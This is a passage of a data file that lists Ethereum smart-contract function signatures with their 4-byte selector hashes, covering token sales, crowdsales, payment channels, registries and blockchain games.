"MinimalPayValue()": "0xbb043d53", "getHours()": "0x0e0a6f0c", "temporalUnit()": "0x3c8a072e", "rewardsupply()": "0xcd06a7bf", "isEcoAllocated3()": "0x1249d3b8", "atomicxSupply()": "0x55ea14f2", "contract_period()": "0xc961df66", "withdrawDelay()": "0x0288a39c", "crowdfundContract()": "0xb70f4b13", "tokenPriceInitial_()": "0xc4c1b39a", "sendRemainsToOwner()": "0xbd95f042", "getOfferCount()": "0xd048db37", "tokenRate2()": "0xe1e46f24", "shopStoreRegister()": "0xaebd4fcd", "mintax()": "0xea5a22eb", "sumPreICO()": "0x11c134e1", "devFeeSize()": "0x27150f01", "payer()": "0x123119cd", "seedStartTime()": "0x81b54498", "dadFab()": "0x6e977865", "rewardAddress()": "0x8cf57cb9", "currentContract()": "0x721d7d8e", "totalWeiRaisedDuringPreICO()": "0xabe8014a", "feeInCirculation()": "0x6d312683", "leftSharePrice()": "0xc5ac8a4d", "revertSuspendedPayment()": "0x9e965f7e", "getBuyersList()": "0x4f8b9e64", "referralTokensAllocated()": "0x188cad26", "toGiveBase()": "0xb45be89b", "pr()": "0x1509c42a", "buyFactorPromotion()": "0xae1b4beb", "minimalSuccessUSD()": "0x105a6356", "duration()": "0x0fb5a6b4", "subscribe(address)": "0x41a7726a", "setDuration(uint256)": "0xf6be71d1", "Duration(uint256)": "0xda04197e", "Priced(uint256)": "0x6866566a", "createPeerReviewContract(address,bytes)": "0xbad751bc", "getCreatefeeWindowIdValue()": "0x15cf59b6", "getCreateFeeWindowUniverseValue()": "0xf48e20f2", "changeContractRegisterOwner(string,string,string,string,address)": "0x87319e1e", "changeModuleRegisterOwner(string,string,address)": "0x3e1092f2", "transferContract(string,string,string,string,string)": "0x337cc706", "getRegisteredContract(uint256,uint256)": "0xa01b0c27", "findModuleVersionByAddress(address)": "0x9b8b6037", "findModuleNameByAddress(address)": "0x222594c5", "findContractVersionByAddress(address)": "0x50391932", "findResNameByAddress(address)": "0x5c2cc46d", "IfContractRegist(string,string,string,string)": "0x3bd7a51a", "IfContractRegist(address)": "0x23d80d3a", "IfModuleRegist(string,string)": "0x2921e6fc", "IfModuleRegist(address)": "0xd0d3b9df", "getContractAddress(string,string,string,string)": "0x95a039ba", "getModuleAddress(string,string)": "0x2c2689b5", "unRegister()": "0x26d7b3b4", "register(string,string,string,string)": "0x0e24c52c", "payForMyself(uint128)": "0x274465b4", "pay(uint128,address)": "0x45f4c1ba", "PaymentForwarder(address,address)": "0x392ec230", "create(address,address,address,address)": "0xabffeffc", "cleanup()": "0x3cecd719", "reserveTokens(uint256)": "0xd031370b", "scheduleStart(uint256)": "0x4c9297fa", "totalTokensSold()": "0x63b20117", "maxTokensSold()": "0x11f58e99", "setup(address,address,address,uint256,uint256)": "0xc7efb162", "EasyMineIco(address)": "0x5b0a6c58", "getProjectStatus()": "0xe7aa3afc", "stopFundRaising()": "0x305d6d31", "fundProject(string)": "0x9f047f3c", "CrowdFunding(string,string,string,uint256,address)": "0x9effb6a6", "Coupon(uint256)": "0x7457a9e1", "NeuroProtect()": "0x3136fa86", "setEnableAllTransfers(bool)": "0xdccb70a7", "setToKnown(address)": "0x6853e3a4", "setConfirmer(address)": "0x2f640a09", "addTwo(uint256)": "0xcae57913", "streamEnd()": "0x54eae3e6", "stream(bytes32)": "0xb70c9acf", "requestPayout()": "0x65058f4c", "allowance(address,uint256,uint256)": "0x4bffc5e4", "TimeSecondToken(uint256,string,string)": "0x718c6569", "testFooArray()": "0xb7db87e8", "FooUser(address)": "0x1cbb67c4", "clearFooArray()": "0xcd2f5f2b", "changeFooIntArrayDynamicSize(uint256)": "0xf813fcfa", "getIntArrayDynamic()": "0x764c98c1", "getAddressArray()": "0xa5b0930d", "memoryArray(uint256)": "0x2c63b326", "createSaflokKey(bytes32,bytes32,bytes32,bytes32)": "0x3e49077a", "addCredentials(bytes32,bool)": "0x2b783bc8", "addIdentity(bytes32,bytes32)": "0x71cb9769", "value(bytes32)": "0x7bfb0934", "keyIndex(bytes32)": "0x9a891058", "valueAtIndexHasNext(uint256)": "0x54b2a080", "keyAtIndexHasNext(uint256)": "0xd77b0ff7", "keyAtIndex(uint256)": "0x8e0db0d9", "insert(bytes32,address)": "0x0a4655dd", "reportWasCalled()": "0xb92e9f9e", "setReportTimestamp(uint256)": "0x4adf6591", "ImportTestB()": "0x9b771346", "isUserHasPermissonToModify(address,string)": "0x3e34f34e", "removePermission(address,string)": "0x37dd186b", "setUserServerPermission(address,string)": "0x7553044b", "getSuperManager()": "0x0463cd73", "processVerification(bytes32,string)": "0xa40edb07", "processScore(bytes32,string)": "0x495d7b26", "Twitter()": "0x30e290e4", "sort(bool)": "0xbcf2e323", "setValue(uint256,uint256)": "0x7b8d56e3", "push(uint256,uint256)": "0xdd1b6137", "getValidatedLiability()": "0x0f610c06", "getLiability()": "0xf3c15f49", "getCoupon()": "0x07634cbe", "getPriceWithInterests(uint256)": "0x2a9f0fb2", "redeemCoupons(uint256)": "0xc5bd9089", "investFromWallet(uint256)": "0xf747b744", "ProjectWithBonds(string,uint256,uint256)": "0x3876df0e", "blocktubeClip(string,uint256,uint256,uint256)": "0x46c968db", "serviceAddressOf(address,uint256)": "0xfa60a16e", "serviceApprovedBy(address,address)": "0x3828b522", "curatorIDOf(address)": "0x4d589c5b", "curatorAddressOf(uint256)": "0x57599dff", "TokenFreezerRules(address)": "0xfd275dd5", "setData(bytes32,uint256,uint256,uint256,uint8[])": "0xdb5ad407", "getAllCounts()": "0x0c294f51", "existsCountsByName(bytes32)": "0x3b85746f", "existsCountsById(uint256)": "0xc6a81857", "getCountsByName(bytes32)": "0xb5c6e7d6", "getCountsById(uint256)": "0xb80509c5", "createCounts(bytes32,address)": "0x2f69ca13", "mul2Require(uint256)": "0xfdd6df8c", "getReservedTokens(uint8)": "0x08612c35", "DWBTToken(uint256,uint256,uint256,uint256)": "0x911d731a", "FRPUSD()": "0x74043a70", "IngridIsAHorribleHumanCoin(uint256,string,uint8,string)": "0x5639eb64", "MMChainToken()": "0xc8ddf66f", "sendTokensTo7(address,address,address,address,address,address,address,uint256)": "0xc6bbb6ef", "AirDropAFTKSeven()": "0xcddfbaaf", "setPotatoOwner(address)": "0xec9be5fe", "setSibling(address)": "0x58392aaa", "ETCrossPotatoPresale(uint256,uint256)": "0x9a4f1e2c", "FPINCOIN(uint256,string,string)": "0x820c05db", "EmpireCrowdsale(uint256,uint256,address,address,uint256,uint256,uint256)": "0xaaaa3218", "LinkToken()": "0x4f8e2fdf", "GlobalBTC()": "0x1df5a8f4", "OKFCrowdsale()": "0x3bbe0b5c", "OKFToken()": "0x30ec98a1", "TheGoDigital()": "0x19726b4e", "Insure()": "0xcffe764c", "FriendsCoin()": "0x1b0d320f", "getCurrentAward()": "0x10972704", "newAward()": "0x3579c0df", "getCooldown()": "0x218e4a15", "getAwardTime()": "0x80dce0b4", "setCooldown(uint256)": "0x4fc3f41a", "_isTime()": "0xc1f307c9", "_triggerCooldown()": "0xddc12019", "_createScene(string,uint256[],address,uint256)": "0x191b8260", "starsOf(uint256)": "0x7519dd8e", "_isGoodAddress(address)": "0xfb92e4fb", "_payAwardOwner(uint256)": "0x145ba84c", "getScene(uint256)": "0x22d7642e", "createContractScene(string,uint256[])": "0x931274c8", "createPromoScene(address,string,uint256[],uint256)": "0xbc81572c", "setPornstarsContractAddress(address,address)": "0x6428a652", "PornSceneToken()": "0xf177fc4f", "refundToBuyersIfSoftCapNotReached()": "0x3174cc87", "tokensAllocatedForTeamAndReserve(address)": "0xb82fcdeb", "tokensAllocatedForCs(address,address,address)": "0x25925806", "tokensAllocatedForAs(address,address,address,address,address,address,address,address,address)": "0xce4ef577", "tokensAllocatedForFs(address,address)": "0x6ff93476", "isPrivateInvestmentPhase()": "0x2d22a4e3", "changeHardCap(uint256)": "0x24f32f82", "changeSoftCap(uint256)": "0x392087fd", "changeMaximumContributionForPublicPhase(uint256)": "0xf5f5f123", "changeMaximumContributionForPrivatePhase(uint256)": "0xd9ece4c7", "changeMinimumContributionForPublicPhase(uint256)": "0x88535e90", "changeMinimumContributionForPrivatePhase(uint256)": "0x4342ffe5", "DayDayCrowdsale(uint256,address,address)": "0x84d47dee", "lockTokensForTeamAndReserve(address)": "0x565f2da9", "lockTokensForCs(address,address,address)": "0xe22aa47a", "lockTokensForAs(address,address,address,address,address,address,address,address,address)": "0xad4a7bd9", "lockTokensForFs(address,address)": "0xb0d81f94", "burningTokens()": "0xe43dfebf", "CCXCrowdsale(address,address)": "0x30226121", "CCXToken()": "0x4fe5f587", "starUp(uint256,uint256,uint256,uint256)": "0x7c0176df", "starUpZero(uint256,uint256,uint256)": "0x220772a9", "ActionStarUp(address)": "0x55d72a7d", "amendLock(uint256,uint256)": "0xcbe56377", "lockTime(address)": "0xa4beda63", "showContributed()": "0x54d87002", "ZperPreSale(address,uint256,uint256,uint256)": "0xae67701f", "Ethurem()": "0x7f33c1e1", "EM122()": "0xd84891da", "Pentacoin()": "0xcadbead4", "allocateTopupToken(address,uint256,uint256)": "0x489979a3", "_clearAddressFromCrowdsale(address)": "0x8c38eddd", "refundExternalPurchase(address,uint256,uint256)": "0x43f99e68", "refundAllExternalPurchase(address)": "0xab3a32c4", "externalPurchaseTokens(address,uint256,uint256)": "0x3762346b", "distributeICOTokens(address)": "0x991cc283", "distributeBonusTokens(address)": "0x67d6bcbf", "claimBonusTokens()": "0xe28d8c4b", "refundPartial(address,uint256,uint256,uint256)": "0xc17281d0", "_refund(address)": "0xbd5821ca", "checkCapAndRecord(address,uint256)": "0x89ccf28c", "_clearTotalBonusTokensByAddress(address)": "0xec164625", "_clearTotalNormalTokensByAddress(address)": "0x694f5a08", "getTotalBonusTokensByAddress(address)": "0x7321a17b", "getTotalNormalTokensByAddress(address)": "0x3b90176f", "getTotalTokensByAddress(address)": "0xf5813085", "getTimeBasedBonusRate()": "0x51ac0d10", "tokensHasSoldOut()": "0x43171485", "revokeKYC(address)": "0x39ba645b", "removeWhitelistAddress(address)": "0xb7ecbaae", "setWhitelistAddress(address,uint256)": "0xfc43bbfb", "setMinWeiToPurchase(uint256)": "0x4921e147", "setBonusTokenRateLevelFour(uint256)": "0x921200ed", "setBonusTokenRateLevelThree(uint256)": "0x9ef48a31", "setBonusTokenRateLevelTwo(uint256)": "0xf9a7c906", "setBonusTokenRateLevelOne(uint256)": "0x2493a2f2", "setLeftoverTokensBuffer(uint256)": "0x827bc64b", "partialForwardFunds(uint256)": "0x17038cb2", "burnExtraTokens()": "0x68fad504", "initialiseCrowdsale(uint256,uint256,address,address)": "0xcab067c0", "SmartCityToken(address,uint256)": "0x9f90688a", "transferFromWithFee(address,address,uint256,uint256)": "0xcb3e394d", "TreatzCoin()": "0xb7da5b0d", "___upgradeToAndCall(address,bytes)": "0x666192b9", "___upgradeTo(address)": "0xc7f84605", "setAddressF1F2(address,address)": "0xedffe3e8", "setAddressF1(address)": "0x90c1288e", "setIntF1F2(int256,int256)": "0xe9e9b5bc", "setIntF1(int256)": "0xfacb2195", "setBoolF1(bool)": "0x4a6f2691", "setStrF1F2F3(string,string,string)": "0xc68218d1", "setStrF1F2(string,string)": "0xba3717c0", "setStrF1(string)": "0x7e470882", "setUintF1F2F3(uint256,uint256,uint256)": "0x78da32f2", "setUintF1F2(uint256,uint256)": "0x91093ba4", "setUintF1(uint256)": "0x359c1912", "getBoolField3()": "0x0e79964c", "getBoolField2()": "0x654142c7", "getBoolField1()": "0xb7595d3f", "getStrField3()": "0x3e28912f", "getStrField2()": "0xd1442e93", "getStrField1()": "0x20e6a2cb", "getUintField3()": "0x1b1c6acf", "getUintField2()": "0x79e05a36", "setIntF1ArrBoolF2AddressF1(int256,bool[],address)": "0xcfe2b37a", "setArrIntF1StrF2(int256[],string)": "0xe86e3f2a", "setArrIntF2ArrUintF3ArrBoolF1(int256[],uint256[],bool[])": "0x3c6a2929", "setStrF1IntF2StrF2UintF2(string,int256,string,uint256)": "0x8a758625", "setBoolF1UintF1StrF2Intf3(bool,uint256,string,int256)": "0xfbccc2b1", "setUintF1IntF3AddressF3(uint256,int256,address)": "0x3277bbda", "getArrBoolField3()": "0xc00b060c", "getArrBoolField2()": "0x554d0429", "getArrBoolField1()": "0xb4cd8865", "getArrUintField3()": "0x616361a7", "getArrUintField2()": "0xa08f1b09", "getArrUintField1()": "0xc53df200", "getArrIntField3()": "0x928c5fb3", "getArrIntField2()": "0x0338e3a5", "getArrIntField1()": "0x54153f91", "getAddressField3()": "0xf453c827", "getAddressField2()": "0xb16b1e28", "getAddressField1()": "0x140da6b7", "getIntField3()": "0x10a86088", "getIntField2()": "0xf7815fae", "getIntField1()": "0x1bfa90bf", "AzlanToken()": "0x67558b3a", "failsafe_addition(uint256,uint256)": "0x8e51d624", "failsafe_subtract(uint256,uint256)": "0x187adf2e", "getLockDataFromMerkleTree(bytes,uint256)": "0x0481559b", "getMerkleRootAndUnlockedAmount(bytes)": "0xb6d9721c", "verifyWithdrawSignatures(bytes32,address,address,uint256,bytes,bytes)": "0x647308ee", "recoverAddressFromWithdrawMessage(bytes32,address,uint256,bytes)": "0x2cc8b455", "recoverAddressFromCooperativeSettleSignature(bytes32,address,uint256,address,uint256,bytes)": "0xe20a4bcd", "recoverAddressFromBalanceProofUpdateMessage(bytes32,bytes32,uint256,bytes32,bytes,bytes)": "0x3f27e9e1", "recoverAddressFromBalanceProof(bytes32,bytes32,uint256,bytes32,bytes)": "0x20c5b497", "getParticipantLockedAmount(address,address,bytes32)": "0xfd5f1e03", "getChannelParticipantInfo(address,address)": "0xac133709", "getChannelInfo(address,address)": "0xf94c9e13", "updateUnlockData(address,address,uint256,bytes32)": "0xa1b6b1b5", "getLocksrootIdentifier(address,address,bytes32)": "0x616eba4a", "getParticipantsHash(address,address)": "0x7c4734f4", "getChannelIdentifier(address,address)": "0x938bcd67", "cooperativeSettle(address,address,uint256,address,address,uint256,bytes,bytes)": "0xf9174551", "unlock(address,address,bytes)": "0x331d8e5d", "settleChannel(address,uint256,uint256,bytes32,address,uint256,uint256,bytes32)": "0x79978630", "updateNonClosingBalanceProof(address,address,bytes32,uint256,bytes32,bytes,bytes)": "0xaec1dd81", "closeChannel(address,bytes32,uint256,bytes32,bytes)": "0x9abe275f", "setTotalWithdraw(address,uint256,address,bytes,bytes)": "0xc472c7e6", "setTotalDeposit(address,uint256,address)": "0xa32a6737", "openChannel(address,address,uint256)": "0x0a798f24", "registerSecretBatch(bytes32[])": "0xbbe8a9b6", "contractExists(address,address)": "0x5cb0887c", "changeTransactionFee(uint256)": "0x5300a306", "changeTransactionFeeRecipient(address)": "0x6a2b5656", "getOrderDetails(uint256)": "0xec7dd7bb", "_fillOrder(address,address,uint256,address,uint256,uint256,uint256)": "0xabebb746", "fillBuyOrder(address,address,uint256,uint256,uint256,uint256)": "0xa76ee2d8", "_cancelOrder(address,address,uint256,address,uint256,uint256,uint256)": "0xd01ab2e6", "cancelSellOrder(address,uint256,uint256,uint256,uint256)": "0x7bf47cda", "cancelBuyOrder(address,uint256,uint256,uint256,uint256)": "0x2b92c776", "_createOrder(address,address,uint256,address,uint256,uint256,uint256)": "0xc54f050c", "createSellOrder(address,uint256,uint256,uint256,uint256)": "0xc7b5716d", "createBuyOrder(address,uint256,uint256,uint256)": "0x78dbfd91", "BasketEscrow(address,address,uint256)": "0x7e8a9db9", "reado()": "0xf886cbda", "buy(uint256,address,bytes32)": "0xc280541c", "listForSale(uint256,bytes32)": "0xbb4b7bd0", "from_Initialisation_to_Lifecycle()": "0xe684d75d", "ZEToken()": "0x5451cbcc", "changeTelephoneOwner(address)": "0x389ece2f", "changeTelephone(address)": "0xdc1d83b3", "getUserPair(address)": "0x40aad0fe", "getAllBlocksByOwner(address)": "0x2aa0426c", "getBlocksByOwnerDesc(uint256,uint256,address)": "0xe1d76c8e", "getBlocksByOwner(uint256,uint256,address)": "0x9f2ee8b8", "getBlocksDesc(uint256,uint256)": "0x637e12f7", "getBlocks(uint256,uint256)": "0xdb714efe", "_verify(address,string)": "0xc232209e", "registerUser(address,string)": "0x0ea126f9", "dissBlock(uint256)": "0x32555f06", "likeBlock(uint256)": "0xa7e5f3c5", "saveBlock(string)": "0x3b70b171", "withdrawl(uint256)": "0xe4480dd8", "getOption(string)": "0x3acfd909", "setOption(string,uint256)": "0x82611dfe", "returnHashLong(address,uint256[3])": "0xcb238ffa", "returnLongAddress(bytes32,uint8,bytes32[2])": "0xc855d689", "placeLong(address[2],uint256[8],uint8,bytes32[2])": "0x9b0f2510", "nonActivationShortWithdrawal(address[2],uint256[8],uint8,bytes32[2])": "0x759f8712", "tokenFulfillmentDeposit(address[2],uint256,uint256[8],uint8,bytes32[2])": "0x75426ec8", "exerciseLong(address[2],uint256[8],uint8,bytes32[2])": "0x677ffb0d", "returnBalance(address,bytes32)": "0x5aff7e54", "returnTokenBalance(address[2],bytes32)": "0x3dcd6176", "returnUserBalance(address[2],bytes32)": "0x307e8614", "returnHash(address[2],uint256[8])": "0x21b8d973", "returnTokenDepositState(address,bytes32)": "0x1c87deec", "buyLong(address[2],uint256[5],uint8,bytes32[3])": "0x1761eab4", "claimDonations(address[2],uint256[8],uint8,bytes32[2])": "0x029a258a", "returnCoupon(address,bytes32)": "0x02356ec0", "claimTokens(address)": "0xdf8de3e7", "WithdrawEther(uint256)": "0x384db9fc", "WithdrawToken(address,uint256)": "0x992ee874", "TokensIn(uint256)": "0x2a5b51c3", "TokensOut()": "0x0a1e9f5e", "setUpgradeMaster(address)": "0xffeb7d75", "returnAllowedTime()": "0xf885eaf2", "preIcoOpeningTime()": "0xf397884b", "totalProceeds()": "0xf1db23dc", "REVISION()": "0xdde43cba", "pauseEnd()": "0xd87522ae", "totalUpgraded()": "0xc752ff62", "pauseMaster()": "0xc5c0b859", "phase()": "0xb1c9fe6e", "setUpgradeAgent(address,uint32)": "0xaa5a20e5", "setBounty(address,uint256)": "0x9a27b7ed", "bounty()": "0x943dfef1", "upgradeMaster()": "0x600440cb", "upgradeAgent()": "0x5de4ccb0", "closingTime()": "0x4b6753bc", "upgrade(uint256)": "0x45977d03", "returnWei()": "0x3f5cbdb6", "icoOpeningTime()": "0x2d884a51", "setPauseMaster(address)": "0x0f4391f5", "getParticipantIndexAddress(uint256)": "0xed1f9991", "transferFundToAccount(address)": "0xea8d103f", "increaseApproval(address,uint256)": "0xd73dd623", "icoStartDate()": "0xd73019e9", "icoWeek4Bonus()": "0xc99b1f28", "setICOWeek3Bonus(uint256)": "0xbae61714", "resetTokenOfAddress(address)": "0xa9f00221", "balancesHold(address)": "0xa660a326", "rateForOnePTM(uint256)": "0xa4fac56e", "setICOWeek1Bonus(uint256)": "0x86ace9b1", "amountRaisedInWei()": "0x72729ff2", "decreaseApproval(address,uint256)": "0x66188463", "setIcoStartDate(uint256)": "0x4a1c13cd", "icoWeek3Bonus()": "0x45b1c336", "transferLimitedFundToAccount(address,uint256)": "0x42498389", "icoWeek2Bonus()": "0x36186868", "getCountPartipants()": "0x1e273649", "priceOfToken()": "0x1b9cbdfb", "distributeTokensAfterIcoByOwner()": "0x162a8e5f", "setICOWeek2Bonus(uint256)": "0x1347b972", "extendSaleEndDate(uint256)": "0x0b6780aa", "icoWeek1Bonus()": "0x06aa4083", "setICOWeek4Bonus(uint256)": "0x03f3e7c8", "createPromoKitty(uint256,address)": "0x56129134", "setSaleAuctionAddress(address,address)": "0xd4df0c6d", "setSiringAuctionAddress(address,address)": "0x23e53b2e", "createSaleAuction(uint256,uint256,uint256,uint256)": "0x3d7d3f5a", "createSiringAuction(uint256,uint256,uint256,uint256)": "0x4ad8c938", "withdrawAuctionBalances()": "0x91876e57", "bidOnSiringAuction(uint256,uint256)": "0xed60ade6", "createGen0Auction(uint256)": "0xc3bea9af", "_computeNextGen0Price()": "0x8e05d8a5", "setNewAddress(address)": "0x71587988", "getKitty(uint256)": "0xe98b7f4d", "WithdrawToHolder(address,uint256)": "0xf8ff612e", "Holders(address)": "0xeec0ddd7", "Deposit()": "0xed21248c", "WithdrawToken(address,uint256,address)": "0xc7de2d13", "Bal()": "0xbea69bb9", "confirmOwner()": "0xbd9b6d86", "WitdrawTokenToHolder(address,address,uint256)": "0x2e2a51bd", "initTokenBank()": "0x290b1e5f", "MinDeposit()": "0x11bcd830", "Cryptopus()": "0x6e4324a3", "getReserves()": "0x0902f1ac", "getNumReserves()": "0xcfff25bb", "KyberNetwork(address)": "0x27880e1f", "setKNCRate(uint256)": "0x1e4b5652", "setKyberNetwork(address)": "0x54a325a6", "setWalletFees(address,uint256)": "0x65dfc20f", "setReserveData(address,uint256,address)": "0x46b8c49e", "handleFees(uint256,address,address)": "0xfd062d3b", "getUserCapInWei(address)": "0x6432679f", "setSgdToEthRate(uint256)": "0x6f512e61", "setCategoryCap(uint256,uint256)": "0x4576a635", "setUserCategory(address,uint256)": "0x16603758", "KyberWhiteList(address)": "0xff49b8ef", "disableTrade()": "0x6940030f", "enableTrade()": "0x0099d386", "SanityPricing(address)": "0xf7fc7783", "abs(int256)": "0x1b5ac4b5", "addBps(uint256,int256)": "0x82b0862f", "ShopDexToken2()": "0x857637c9", "Menu06(address,address,uint256)": "0x49dc8fab", "ILove0xBTC(string)": "0x64dc68b8", "airDropToken(address,uint256)": "0x70c83314", "airDropCoin(uint256)": "0x52bf74b3", "importFromOld(address,address,address,address,address[],uint256[])": "0xd4a04ff4", "setApp(address,address)": "0x84c64a19", "setDetail(string)": "0x6459361d", "massApprove(address[],uint256[])": "0x06c6c546", "_safeSubtract(uint256,uint256)": "0x69d4e250", "_absSubtraction(uint256,uint256)": "0xa62d4df3", "_unregisterAttack(bytes32)": "0x643ac0bd", "_validateUserActive(address)": "0x46286c18", "completeAttack(bytes32)": "0xceeea0ea", "attackeePrizeByToken(bytes32,address,address)": "0xb38d3ab4", "attackerPrizeByToken(bytes32,address,address)": "0x5504bf71", "attackPrizeRatio(address)": "0x7c6fa5c2", "_calculateScore(uint256,uint256,uint256,uint256)": "0xa784ef22", "getUserScore(address)": "0xb34e0c47", "openAttacksCount(address)": "0x73dc7635", "setMaxOpenAttacks(uint256)": "0x6dc1a075", "setMaxAttackPrizePercent(uint256)": "0xcc797d8e", "isActiveUser(address)": "0x4202d214", "updateMarketData(address,address,uint256,uint256,uint256)": "0x61be8456", "isTokenSupported(address,address)": "0xdb47b9c9", "addSupportedToken(address,address)": "0xc2b7be16", "getMarketData(address,address)": "0x34a2b766", "getMarketDataByTokenIdx(uint256)": "0xead491ac", "getSupportedTokenByIndex(uint256)": "0xf4e50a4d", "numberOfSupportedTokens()": "0x15a653a0", "KKCToken(address)": "0xbce49a90", "BEECASHBACKHOME()": "0x00aec05d", "issua(uint256)": "0x41554a2e", "back(address,uint256)": "0xb870f613", "SimpleToken(uint256,string,uint8,string,bool,bool)": "0x94fe344d", "blockVersion()": "0xcce0cd0c", "EURsToken()": "0x1b189efb", "addVolumeDiscount(uint256,uint8)": "0xd7bdc3fa", "setDiscount(uint8)": "0x6d9cebb2", "updateVettingTime(uint256)": "0xbea8bd27", "updateShareTimeGap(uint256)": "0x0bd93738", "updateMaxNumMC(uint256)": "0xb1d0073b", "updateValidMCAmount(uint256)": "0xcb950c37", "upgradeEvilMorty(address,address)": "0xc8f099cb", "claimShare(uint256)": "0x0cc03e7a", "updateMC(uint256)": "0x76917b68", "getIndex(address,address)": "0xd1ed3dad", "getMC(uint256)": "0x2653ab19", "Yotra()": "0xe757835e", "DeviseToken(uint256)": "0xc6967c17", "removeMinterByValue(address)": "0xabc897f4", "removeMinterByIndex(uint256)": "0xbe0043bc", "getMinter(uint256)": "0x5b7121f8", "getProposalExecutionTime(bytes32,address)": "0x3a256daa", "getProposalExternalToken(bytes32,address)": "0xf70bbb9a", "getProposalExternalTokenReward(bytes32,address)": "0x1c3a5713", "getProposalEthReward(bytes32,address)": "0x6046f71d", "changeEEMWallet(address)": "0x3443c64a", "LotteryGames()": "0x83d66353", "setBullAmount(uint256)": "0x3e8616c8", "WPAYReward()": "0x8b5bc550", "GCA1()": "0xf8725493", "maroonToken()": "0xa6f7541c", "Simt()": "0x81af0750", "BulkToken()": "0xc366b1d3", "OxyToken()": "0x6caa2bda", "GenericToken(string,uint8,string,uint256)": "0x4f118ad7", "getAmountToGive(address,address,address,uint256,uint256,uint256,uint256,uint8,bytes32,bytes32,uint256)": "0x8d86faa6", "approveForBurn(address,uint256)": "0x3873eeb8", "allowanceToBurn(address,address)": "0xfec9cd77", "setMiBoodleVault(address)": "0xb1063c19", "setFundingtokens(uint256)": "0x5e3df83f", "setPreFundingtokens(uint256)": "0x9b8b7160", "setFundingEndTime(uint256)": "0x3412a4ac", "setFundingStartTime(uint256)": "0x513d16a7", "setPreFundingStartTime(uint256)": "0x32c468fa", "setMaximumEtherToAccept(uint256)": "0xf9dfa4a3", "setMinimumEtherToAccept(uint256)": "0xefd979cb", "MiBoodleToken(uint256,uint256,uint256,uint256,uint256)": "0x2a42e85f", "Haltable()": "0xb76467c1", "GateToken()": "0x73321f03", "WPAYCoin()": "0xfe90f3df", "revokeAuthority(address,uint256)": "0x95652e4f", "approveAuthority(address)": "0xca3dd175", "isRootAuthority(address)": "0xbf0ce059", "changeRootAuthority(address)": "0xa2c030a5", "SingleSourceAuthority()": "0xa0ce8a0e", "SkyToken()": "0xa23a5315", "RMBToken()": "0x07c38522", "setSellInfo(uint8,uint256,uint256)": "0x86e6361e", "SSOrgToken(string,string,uint256)": "0x2311542e", "TongTong(string,string,uint256)": "0x2b15eb9b", "setRescue(address,bool)": "0xa5a45785", "FlogmallAirdropper(address,uint256)": "0x4437e7a0", "mark()": "0x8c0d0c29", "Penchant()": "0x5afb408a", "_addMember(address,uint256)": "0xe431af36", "ETCCoin()": "0xdc376392", "CORENET()": "0xb49575a7", "Moontrail()": "0x9bc53cec", "constrctor()": "0x039bd55a", "getcurrNumOfUpgrades()": "0xc3192c82", "getcurrNumOfCards()": "0xe76f0836", "CreateUpgradeCards(uint256,uint256,uint256,uint256,uint256,uint256)": "0x9779e135", "InitUpgradeCard()": "0xe8f4bc12", "SilverFiftyToken()": "0xacd4e4aa", "MOEToken()": "0x2545a07a", "_updateReputationScore(bytes32,bytes32)": "0xee66dc36", "_activateDevice(bytes32)": "0x02238cbd", "_registerDevice(address,bytes32,bytes32,bytes32)": "0xe03bc7e1", "_distributeRewards(address,address,uint256)": "0x1c7a39e2", "setDefaultReputationForManufacturer(bytes32,bytes32)": "0x1db1c805", "depositTokens(bytes32,uint256)": "0x222b8947", "setTokenPoolReward(uint256)": "0x252dbc36", "changeManufacturerWallet(address)": "0x8b3edbdf", "removeNetworkMember(address)": "0xb27f829e", "addNetworkMember(address,bool,bool,bool,bytes32)": "0x13ac2bdb", "registerDevices(bytes32[],bytes32[],bytes32[])": "0x95f62fb9", "calculateReward(uint256,uint256)": "0x13ed0846", "getReputationRewards(address,address,bytes32)": "0x2217bf78", "updateReputationScore(bytes32,bytes32)": "0x3d32cb63", "registerAndActivateDevice(bytes32,bytes32,bytes32)": "0x6d54ec91", "activateDevice(bytes32)": "0x568f9ce1", "registerDevice(bytes32,bytes32,bytes32)": "0x7900438b", "blockThreshold()": "0x4c41a6c7", "reputationIRNNodeShare()": "0xaaabdf16", "defaultReputationReward()": "0xa10a7782", "activationFee()": "0x77d630ae", "registrationFee()": "0x14c44e09", "ARTISTCOIN()": "0x9c7b3d79", "WorldToken(uint256,string,uint8,string)": "0x57f70b21", "LemonSelfDrop1()": "0x45a132d4", "EdelRostenCoin()": "0xc0652cf9", "mineit(address,uint256)": "0xc2dab162", "PROSH()": "0xeee14119", "PXGToken()": "0x9f34ab0c", "tryAirdrop()": "0xda9da572", "BGJC(uint256,string,string)": "0x2b3b885d", "setupRace(uint32,uint32)": "0x8b63c86f", "priceCallback(bytes32,uint256,bool)": "0x11dcee2f", "endGame(uint256,uint256,address)": "0x1100a9d8", "endGame(uint256,string,address)": "0x6ece5937", "checkGameSideAmount(uint256,uint256)": "0x1cfcc5bb", "checkGameAmount(uint256)": "0xa5d18cb6", "placeBet(string,string)": "0x4844f367", "getAddBal()": "0x646e90e7", "getSides(string,uint256)": "0x5d2aa757", "getSidesById(uint256,uint256)": "0x3c50edbd", "dish(string,address)": "0x6763da56", "checkSidePledge(uint256)": "0x480140ca", "allSidesPledgedAmount()": "0xd366f83b", "placeBet(address,uint256,string)": "0xeb987ca7", "getIdFromStr(string)": "0xc58068d8", "getStrFromId(uint256)": "0x37ec757f", "NuggetsToken()": "0xb6beb400", "getCreateOrderMinGasNeeded()": "0x86df3d5b", "getFillOrderMinGasNeeded()": "0xa3bc3fce", "KODB(address)": "0x643d71a2", "transferWithLock(address,uint256,uint32)": "0x47ec8138", "AECTToken(uint256,string,string)": "0xb4472022", "addGame(address,string)": "0x3fda926e", "determinePID(address)": "0x3a16e81e", "registerNameCore(uint256,address,uint256,bytes32,bool,bool)": "0x42f362aa", "useMyOldName(string)": "0xb9291296", "addMeToAllGames()": "0x0c6940ea", "addMeToGame(uint256)": "0x81c5b206", "checkIfNameValid(string)": "0x6c52660d", "TUMIYUNTOKEN(uint256,string,uint8,string)": "0x6120e125", "Nai()": "0x50c40877", "changeBonusRate(uint256)": "0x231a00cc", "addBonus(address,uint256)": "0x5a93cc8f", "_updateSalePrice(uint256,uint256,address)": "0xbc7202d7", "updateSalePrice(uint256,uint256)": "0x4896672e", "CelebrityMarket(address)": "0xd7ca3a90", "PFGC(uint256,string,string,bool)": "0xe7bd85ca", "updateLemonCoinsRemainingToDrop()": "0xc8fddb80", "withdrawLemonCoins()": "0xb02a2fd1", "setRewards(uint256,uint256,uint256)": "0xf36d1e4e", "LemonSelfDrop()": "0x43deb064", "Sgethereum(uint256,string,string)": 